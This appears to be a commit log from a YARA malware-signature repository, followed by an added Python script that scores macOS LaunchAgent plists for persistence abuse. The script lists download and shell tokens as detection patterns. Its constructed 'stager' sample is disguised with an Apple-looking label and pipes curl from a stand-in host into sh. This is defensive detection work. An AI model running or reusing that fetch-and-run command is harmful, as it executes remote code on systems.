Commit Graph

673 Commits

Author SHA1 Message Date
John Lambert
7bfd6e14da Update gen_macro_ShellExecute_action.yar 2019-01-31 19:38:50 -08:00
Florian Roth
4dafd62d5e APT DNS Hijacking campaign AA19-024A
https://www.us-cert.gov/ncas/alerts/AA19-024A
2019-01-29 15:31:54 +01:00
Florian Roth
6332f7c6ca Kitty Fork Putty FP 2019-01-29 15:31:54 +01:00
Florian Roth
7564e6e8e6 False Positive Reduction
https://github.com/Neo23x0/signature-base/issues/54
2019-01-24 11:03:01 +01:00
Florian Roth
b5f6c82040 Suspicious RTF header anomaly 2019-01-20 17:36:32 +01:00
Florian Roth
e3bee33094 False Positive Reduction 2019-01-20 17:36:18 +01:00
Florian Roth
caef03b95b fix: moved lsadump rule from general rules to the ext vars file 2019-01-19 12:22:32 +01:00
Florian Roth
ccd0b61cfd bugfix: PowerShell_Susp_Parameter_Combo 2019-01-17 13:18:07 +01:00
Florian Roth
ca7f252dc0 False Positive Reduction 2019-01-17 13:12:39 +01:00
Florian Roth
c0b0167e7b That's great 2019-01-16 19:29:40 +01:00
Florian Roth
e1262a718e I'd adjust it like that 2019-01-16 19:27:29 +01:00
Jeff Beley
3fa7540094 Added rules for a tiny webshell and a go based htran variant 2019-01-16 10:58:25 -06:00
Florian Roth
32182ab8ff Nitol Malware 2019-01-14 11:20:18 +01:00
Florian Roth
6d0e6bc997 Update gen_bad_pdf.yar 2019-01-10 11:28:31 +01:00
Clément Notin
a61ab94eff gen_bad_pdf.yar: fix detection of Metasploit generated files 2019-01-10 10:49:55 +01:00
John Lambert
0de78e6654 Create gen_macro_ShellExecute_action.yar
Rule finds VBA macro samples that use the ShellExecute "evasion" method specified in the tweet mentioned in the rule.
2019-01-08 12:22:19 -08:00
Florian Roth
4349f58d37 Score adjustments 2019-01-08 09:18:54 +01:00
Florian Roth
9a0e7a44fb Cryp RAT 2019-01-08 09:18:45 +01:00
Florian Roth
7216c088b0 JAVA class with VBS content 2019-01-07 13:28:06 +01:00
Florian Roth
6d9577a703 Putty abnormal file sizes 2019-01-07 13:27:31 +01:00
Florian Roth
03f109c14e Improved script obfuscation rule 2019-01-03 11:04:14 +01:00
Florian Roth
9eec73061a APT28 Zebrocy Golang Loader by @VK_Intel
https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html
2019-01-02 09:19:09 +01:00
Florian Roth
d26a5045d9 Ryuk Ransomware 2018-12-31 14:56:56 +01:00
Florian Roth
2fb2bd2481 fix: removed duplicate rule 2018-12-29 17:00:19 +01:00
Florian Roth
b6920c0d0c Moved NK miner to generic list 2018-12-29 09:31:57 +01:00
Florian Roth
82a91c8d6c Update on crypto coin miner 2018-12-29 09:31:14 +01:00
Florian Roth
819c4f2ac5 fix: missing "pe" import 2018-12-29 09:20:24 +01:00
Florian Roth
0b96d7131d APT10 rule update with imphash rule 2018-12-29 09:17:56 +01:00
Florian Roth
900796dcdf Hacktool NoPowerShell 2018-12-28 14:57:03 +01:00
Florian Roth
046b5736d0 YARA rule description cleanup 2018-12-28 12:38:31 +01:00
Florian Roth
cf85a7cd31 YARA rule svchosts 2018-12-22 09:12:34 +01:00
Florian Roth
72eaa194ae Area1 Phishing Diplomacy Rules 2018-12-19 19:17:51 +01:00
Florian Roth
f73324aa1a Minor adjustments in gen_malware_MacOS_plist_suspicious rule 2018-12-16 10:10:42 +01:00
John Lambert
bd8185482f Detect suspicious MacOS launch agent config files
plist files contain configuration for user-specific background jobs in OSX. Malware abuses this feature for persistence. Coin miners have been seen to use this feature as well.
2018-12-14 13:55:31 -08:00
Florian Roth
13b238f39f Fixed character formatting to wide in SUSP_Scheduled_Task_BigSize 2018-12-14 08:58:10 +01:00
Florian Roth
1b959e2a3b False Positives on Exchange with SUSP_Scheduled_Task_BigSize 2018-12-14 08:55:48 +01:00
Florian Roth
e4dd8c610c Fixed some dates 2018-12-14 08:55:27 +01:00
Florian Roth
e118b0c92e Rule: Powershell Obfuscation 2018-12-13 14:25:01 +01:00
Florian Roth
826446a785 Low scoring rule: Anomaly - Linux UPX compressed binaries 2018-12-13 14:24:41 +01:00
Florian Roth
ab5ac55a1b New HawkEye keylogger rule 2018-12-12 09:24:12 +01:00
Florian Roth
a22874af46 Lazagne Password Dumper 2018-12-11 15:12:42 +01:00
Florian Roth
80a090685d False Positive Reduction and Cleanup 2018-12-11 15:08:39 +01:00
Florian Roth
9d38c8f4b3 Suspicious Scheduled Task BigSize 2018-12-07 08:20:44 +01:00
Florian Roth
2ed2af38f8 Suspicious Pirated Office 2007 2018-12-07 08:20:31 +01:00
Florian Roth
73bfc659da fix: bugfix in SSHDoor rule - missing "and" 2018-12-05 21:03:24 +01:00
Florian Roth
a2c2478527 Limited SSHDoor rule to ELF to avoid false positives 2018-12-05 21:00:25 +01:00
Florian Roth
63010d1954 Linux/SSHDoor - Triton related by ESET - modified version
https://github.com/eset/malware-ioc/tree/master/sshdoor
2018-12-05 20:58:02 +01:00
Florian Roth
0a3567621b fix: bugfix in generic_anomalies rule 2018-12-01 13:32:26 +01:00
Florian Roth
9291c8c9a1 fix: bugfix in general_anomalies.yar rule 2018-12-01 13:02:18 +01:00
Florian Roth
8cd247169a False Positive Reduction 2018-12-01 08:33:33 +01:00
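Commit bd8185482f above describes the persistence mechanism behind the macOS launch agent rule: plist files configure user-specific background jobs, and malware and coin miners abuse them to survive reboots and logins. The script below is an added worked example of triaging such files; it is not code from signature-base and does not reproduce the logic of gen_malware_MacOS_plist_suspicious. The indicator lists, weights, threshold and the three sample plists are constructed assumptions for illustration, chosen to show the combination a reviewer looks for (a persistence key such as RunAtLoad or KeepAlive together with a program that runs from a writable location, invokes shell or download tooling, carries miner artefacts, or hides behind an Apple-looking label).

```python
"""Heuristic triage of macOS LaunchAgent/LaunchDaemon plist files.

Added example for this commit log, not a rule from signature-base. Indicator
lists, weights, threshold and sample files are constructed assumptions.
"""
import plistlib

# Assumed indicators (not the project's rule content).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/", "/Users/Shared/", "/Library/Caches/")
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64", "sh -c", "bash -c", "python -c", "osascript", "nohup ")
MINER_TOKENS = ("xmrig", "stratum+tcp", "minerd", "cpuminer", "--donate-level")

# Assumed weights: persistence keys are normal on their own and add little;
# content indicators carry the decision. THRESHOLD = 40 flags one content
# indicator plus a persistence key, or any two content indicators.
WEIGHTS = {
    "RunAtLoad": 10,
    "KeepAlive": 10,
    "program in temp/shared dir": 30,
    "shell/download tooling in ProgramArguments": 30,
    "coin miner artefacts": 50,
    "Apple-like label with non-system program": 30,
}
THRESHOLD = 40


def analyse_launch_agent(data: bytes) -> dict:
    """Parse one plist (XML or binary) and return indicators, score and verdict."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # InvalidFileException, expat errors, ...
        return {"error": f"unparseable plist: {exc}", "indicators": [], "score": 0, "suspicious": False}
    if not isinstance(plist, dict):
        return {"error": "top-level object is not a dict", "indicators": [], "score": 0, "suspicious": False}

    # launchd accepts Program and/or ProgramArguments; normalise to one command line.
    args = plist.get("ProgramArguments") or []
    if isinstance(args, str):
        args = [args]
    if plist.get("Program"):
        args = [plist["Program"]] + list(args)
    cmdline = " ".join(str(a) for a in args)
    lowered = cmdline.lower()
    label = str(plist.get("Label", ""))

    indicators = []
    if plist.get("RunAtLoad") is True:
        indicators.append("RunAtLoad")
    if plist.get("KeepAlive") not in (None, False):  # True or a condition dict
        indicators.append("KeepAlive")
    if any(d in cmdline for d in SUSPICIOUS_DIRS):
        indicators.append("program in temp/shared dir")
    if any(t in lowered for t in SUSPICIOUS_TOKENS):
        indicators.append("shell/download tooling in ProgramArguments")
    if any(t in lowered for t in MINER_TOKENS):
        indicators.append("coin miner artefacts")
    # Assumption: Apple's own agents run binaries under /System or /usr, so an
    # Apple-looking label pointing anywhere else is treated as masquerading.
    if label.startswith("com.apple.") and "/System/" not in cmdline and "/usr/" not in cmdline:
        indicators.append("Apple-like label with non-system program")

    score = sum(WEIGHTS[i] for i in indicators)
    return {"label": label, "indicators": indicators, "score": score, "suspicious": score >= THRESHOLD}


# Constructed sample plists (not real-world files), serialised with plistlib.
SAMPLES = {
    "benign": plistlib.dumps({
        "Label": "com.vendor.updater",
        "ProgramArguments": ["/Applications/Vendor.app/Contents/MacOS/updater", "--check"],
        "RunAtLoad": True,
        "StartInterval": 3600,
    }),
    "stager": plistlib.dumps({
        "Label": "com.apple.softwareupdate.helper",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/x | base64 -d | sh"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "miner": plistlib.dumps({
        "Label": "com.xmrig.agent",
        "ProgramArguments": ["/Users/Shared/.xmrig/xmrig", "-o", "stratum+tcp://pool.invalid:3333"],
        "RunAtLoad": True,
        "KeepAlive": {"SuccessfulExit": False},
    }),
}


def scan_samples() -> dict:
    """Run the triage over every constructed sample and return name -> result."""
    return {name: analyse_launch_agent(data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:8} score={result['score']:3} suspicious={result['suspicious']} {result['indicators']}")
```

Running the block prints one line per sample: the vendor updater scores 10 (RunAtLoad alone) and is not flagged, the shell stager scores 80, the miner 100. Against real LaunchAgents the directory and token lists need tuning per estate, and the parse-error branch matters because launchd tolerates files that plistlib rejects, so an unparseable plist in a LaunchAgents folder deserves a look rather than silent skipping.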